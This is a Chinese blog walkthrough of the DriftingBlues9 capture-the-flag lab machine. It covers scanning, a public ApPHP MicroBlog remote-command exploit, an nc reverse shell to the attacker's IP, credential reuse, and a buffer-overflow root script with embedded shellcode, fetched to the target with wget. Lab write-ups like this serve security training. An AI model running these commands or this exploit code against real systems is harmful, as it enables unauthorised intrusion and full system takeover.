【靶场系列】driftingblues9

最新推荐文章于 2024-06-11 08:18:35 发布
最新推荐文章于 2024-06-11 08:18:35 发布
阅读量339 收藏 7
点赞数 8
分类专栏: 靶场系列 文章标签: 安全 web安全 网络安全 系统安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41169485/article/details/137966044
版权

信息收集

nmap扫描获取主机ip

nmap -sV -A -p- 192.168.56.0/24

Nmap scan report for 192.168.56.135
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: ApPHP MicroBlog vCURRENT_VERSION
|_http-title: ApPHP MicroBlog
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          49654/tcp6  status
|   100024  1          53692/udp6  status
|   100024  1          54469/tcp   status
|_  100024  1          56288/udp   status
54469/tcp open  status  1 (RPC #100024)

目录爆破

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.135/ -x php,txt

/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.135/images/]
/index.php            (Status: 200) [Size: 5656]
/docs                 (Status: 301) [Size: 315] [--> http://192.168.56.135/docs/]
/page                 (Status: 301) [Size: 315] [--> http://192.168.56.135/page/]
/header.php           (Status: 200) [Size: 13]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.135/admin/]
/footer.php           (Status: 500) [Size: 614]
/license              (Status: 301) [Size: 318] [--> http://192.168.56.135/license/]
/README.txt           (Status: 200) [Size: 975]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.135/js/]
/include              (Status: 301) [Size: 318] [--> http://192.168.56.135/include/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.56.135/backup/]
/styles               (Status: 301) [Size: 317] [--> http://192.168.56.135/styles/]
/INSTALL.txt          (Status: 200) [Size: 1201]
/.php                 (Status: 403) [Size: 279]
/wysiwyg              (Status: 301) [Size: 318] [--> http://192.168.56.135/wysiwyg/]
/server-status        (Status: 403) [Size: 279]
/mails                (Status: 301) [Size: 316] [--> http://192.168.56.135/mails/]

有redme文件
image.png

获取shell

查找漏洞

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit apphp                                               
-----------------------------------------------------------------------------
 Exploit Title     
|  Path
-----------------------------------------------------------------------------
ApPHP MicroBlog 1.0.1 - Multiple Vulnerabilities                              | php/webapps/33030.txt
ApPHP MicroBlog 1.0.1 - Remote Command Execution                              | php/webapps/33070.py
ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author)           | php/webapps/40506.html
ApPHP MicroBlog 1.0.2 - Persistent Cross-Site Scripting                       | php/webapps/40505.txt
ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin)                 | php/webapps/40517.html
ApPHP MicroCMS 3.9.5 - Persistent Cross-Site Scripting                        | php/webapps/40516.txt
----------------------------------------------------------------------------
Shellcodes: No Results

复制exp

sudo cp /usr/share/exploitdb/exploits/php/webapps/33070.py 33070.py

执行exp

python2 33070.py http://192.168.56.135

image.png
反弹shell

nc -e /bin/bash 192.168.56.129 4444

获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看/etc/passwd文件,发现有个clapton用户

www-data@debian:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim:x:104:109::/var/spool/exim4:/bin/false
statd:x:105:65534::/var/lib/nfs:/bin/false
messagebus:x:106:112::/var/run/dbus:/bin/false
mysql:x:107:114:MySQL Server,,,:/var/lib/mysql:/bin/false
clapton:x:1000:1000:,,,:/home/clapton:/bin/bash

这个用户和执行exp后得到的数据库用户账号和密码一样,猜测两者的密码也一样,遂登录
image.png

权限提升

用户目录下有note.txt和input程序

clapton@debian:~$ cd ~
cd ~
clapton@debian:~$ ls
ls
input  note.txt  user.txt

查看note.txt文档,文中提到缓冲区溢出

clapton@debian:~$ cat note.txt  
cat note.txt
buffer overflow is the way. ( ° ʖ °)

if you're new on 32bit bof then check these:

https://www.tenouk.com/Bufferoverflowc/Bufferoverflow6.html
https://samsclass.info/127/proj/lbuf1.htm

从大佬的wp扒下来提权脚本

# -*- coding: utf-8 -*-
#!/usr/bin/python
from subprocess import call,Popen,PIPE
import struct
 
p=Popen("ldd ./input | grep libc",shell=True,stdout=PIPE)
libc_addr=p.stdout.read()[-12:-2]
print(libc_addr)
eip=0x2a81+int(libc_addr,16)
jmp_esp=struct.pack('<I', eip)
pad="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
sc='\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80'
buff=pad+jmp_esp+sc
i=0
while 1<256:
    ret=call(['./input',buff])
    if not ret:
        break
    i+=1

保存脚本到web服务器下,让靶机下载,注意要让input文件和input.py在同一目录下

wget 192.168.56.129/input.py

发现用户对/home/clapton目录没有写的权限,所以先赋予权限

chmod 777 /home/clapton

运行脚本获取root权限
image.png

中原第一高手
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
webgoat靶场需要自行搭建
01-19
webgoat靶场需要自行搭建
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
靶场系列driftingblues6
qq_41169485的博客
04-22 407
robots.txt文件提示不要忘了扫描zip文件,可能是备份文件泄露。发现一处文件上传,经查该cms有任意文件上传,尝试上传一句话木马成功。上传linpeas.sh脚本执行,得到建议利用的系统历史漏洞。直接使用CVE-2016-5195脏牛提权漏洞。网上查询到该cms的文件上传目录,直接访问。使用密码打开压缩包,这段文本类似账号密码。在管理界面可以把界面语言改成简体中文。使用python获取交互式shell。会下载spammer.zip压缩包。压缩包被加密了,尝试爆破。发现登录界面和安装界面。
靶场系列driftingblues8
qq_41169485的博客
04-24 254
登录clapton账号看到根目录下有多个文件,还有wordlist.txt字典,可能是想让我们用这个字典爆破。复制下来用john爆破,得到clapton用户的密码,但是root的密码爆不出来。看到登录页面是openemr,随在kali中查找该cms的漏洞。爆破目录,基本上的都是目录遍历,不过都没什么用就是了。写有用户secure的账号和密码,但是只能本地登录。扫到wordlist.txt文件,是个字典。保存字典,使用john爆破出root密码。尝试4.1.1版本的漏洞,利用不成功。nc反弹shell成功。
靶场系列driftingblues2
qq_41169485的博客
04-19 420
登录后台,发现hello.php是可以编辑的,遂写入一句话木马。发现普通用户freddie用户开启了ssh登录,且私钥是可读的。nc反弹shell,注意payload需要url编码。下载linpeas.sh脚本,赋予执行权限并执行。访问hello.php,成功执行phpinfo。在kali上写入私钥文件,并设置为权限为600。使用wpscan扫描器扫描,先爆出用户。将压缩包保存到web服务器下,靶机下载。将域名写入hosts即可正常访问。访问80端口,发现使用域名。执行exp获取root权限。
靶场系列driftingblues
qq_41169485的博客
04-19 302
爆破域名,所以就跳过这一步直接得到test.driftingblues.box了。该脚本会用root权限执行/tmp/emergency程序,但该系统里并没有该程序。编辑/tmp/emergency实现更改root密码,并赋予执行权限。将test.driftingblues.box写入hosts文件。查看首页源代码,在最下方发现一段base64编码。尝试爆破在主页发现的一个用户eric,成功。等待定时任务执行,可以看到任务执行成功了。猜测需要域名访问,首先要知道靶机的域名。
靶场系列driftingblues7
qq_41169485的博客
04-23 284
扫到一个.bash_history文件,下载查看,根据历史命令推测该目录下还存在一个eon文件。访问80端口,自动跳转到443端口,该cms是eyesofnetwork。根据查找到的EyesOfNetwork漏洞,选了一个可以rce的开始利用。使用john爆破zip密码,得到压缩包密码为killah。推测该账号密码是443端口的web页面登录密码,成功登录。搜索该cms的漏洞,可以看到该cms有很多漏洞。解码可知该文件是zip文件,因为有PK头。解码得到压缩包,但是需要密码才能打开。
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
vuInhub靶场实战系列-DC-9实战
06-02
vuInhub靶场实战系列-DC-9实战
靶场系列driftingblues5
qq_41169485的博客
04-21 285
创建名为fracturedocean的目录后,keyfolder文件夹内多出了rootcreds.txt文件。下载用户目录下的keyfile.kdbx文件,这是一个储存密钥的文件,同时自身也有密码。上传执行pspy脚本,监控定时任务,发现key.sh每分钟都在执行。经过逐一测试,该密码是gill用户的密码,登录ssh。有了root权限后,查看key.sh文件内容。脚本,发现keyfolder目录。查看文件内容,发现是root密码。目录下创建以下名称的目录或文件。扫漏洞,没有合适的漏洞。
等保测评和安全运维
最新发布
weixin_64392888的博客
06-11 485
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
安全生产月”专题报道:AI智能监控技术如何助力安全生产
TSINGSEE青犀视频官方技术博客
06-04 994
方案能够通过对人员行为的识别和分析,判断是否存在安全隐患。这些功能的实现,有助于企业提高安全管理水平,减少因人为因素导致的安全事故。
应用程序加固的优势及其在移动应用安全中的重要性
gulu230220的博客
06-05 543
通过提升应用程序的安全性、防止应用程序被篡改、提高应用程序的抗攻击能力、保护应用程序的知识产权和提升用户体验和信任度,加固技术可以有效保障移动应用的安全和稳定,为用户提供更加安全和可靠的移动应用服务。通过加固应用程序的安全漏洞和弱点,加固技术可以防止黑客利用已知的攻击手段和工具对应用程序进行攻击,提高应用程序的安全性和稳定性。通过加密和混淆应用程序的源代码和关键算法,加固技术可以防止黑客和竞争对手获取应用程序的源代码和商业机密,保护开发者的创新成果和商业利益。应用程序加固能够有效提升移动应用程序的安全性。
《软件定义安全》之二:SDN/NFV环境中的安全问题
大龄IT民工
06-07 1111
南向协议主要侧重于南向接口上的数据转发、网络配置、数据平面信息收集等功能。OpenFlow协议OpenFlow是SDN的标志性技术,他体现了SDN的核心思想:控制与转发分离。它通过流表控制技术支持用户对数据流行为进行控制。OpenFlow交换机根据流表来转发数据包,代表数据转发平面;控制器通过全网络视图来实现管控功能,其控制逻辑表示控制平面。OpenFlow协议的发展演进一直都围绕着两个方面,一方面是控制平面的增强,让系统功能更丰富、更灵活;
纷享销客安全体系:数据安全
fxiaoke_com的博客
06-07 890
纷享销客CRM系统部署了综合性的防勒索软件系统,该系统融合了网络分区、访问控制以及备份解决方案等多重防护措施,旨在有效应对针对企业的勒索软件攻击,从而确保企业数据的安全性和业务的连续性。同时,公司积极响应数据主体的各种隐私权利要求,如访问权、更正权和删除权等,确保个人信息安全、机密,并防止任何未经授权的访问和滥用行为的发生。当租户发出请求时,系统要求携带经过高标准加密的身份信息,以便数据隔离算法能够精确识别不同租户的请求,并据此决定数据的存储与读取路径,从而满足租户间数据隔离的严格需求。
Linux系统安全及应用
2301_77871499的博客
06-05 1162
在执行过程中,分析出来的弱口令账号将即时输出,第一列为密码字串,第二列的括号内为相应的用户名(如用户kadmin 的密码为“123456”)。John the Ripper 是一款开源的密码破解工具,能够在已知密文的情况下快速分析出明文的密码字串,支持DES 、MD5 等多种加密算法,而且允许使用密码字典(包含各种密码 组合的列表文件)来进行暴力破解。只要获得用户的命令历史文件,该用户的命令操作过程将会一览无余,如果曾经在命令行输入明文的密码,则无意之中服务器的安全壁垒又多了一个缺口。
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场】vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值